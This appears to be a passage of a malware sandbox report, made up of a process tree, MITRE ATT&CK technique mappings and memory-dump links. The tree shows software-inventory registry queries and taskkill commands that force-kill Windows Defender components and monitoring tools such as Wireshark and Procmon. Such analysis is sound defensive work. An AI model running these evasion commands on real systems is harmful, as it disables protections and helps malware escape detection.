    PID:388
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4152
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4272
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4260
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4148
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4228
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:4748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4676
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4684
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:4752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4864
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4532
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:5096
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4528
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:3616
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:4124
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:1608
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:756
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:3436
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:1460
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:2700
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:596
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4152
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4148
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4892
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4768
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:1412
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4176
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:3596
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:852
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4124
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:2112
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:2552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:624
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4240
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:2492
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1284
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:5096
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2984
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4400
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4164
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5024
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4604
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2664
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4752
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5072

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2444-99-0x000001FC5D100000-0x000001FC5D101000-memory.dmp

Filesize
4KB

Download
memory/2444-114-0x000001FC77530000-0x000001FC77531000-memory.dmp

Filesize
4KB

Download
memory/2444-84-0x00007FF960210000-0x00007FF960BFC000-memory.dmp

Filesize
9.9MB

Download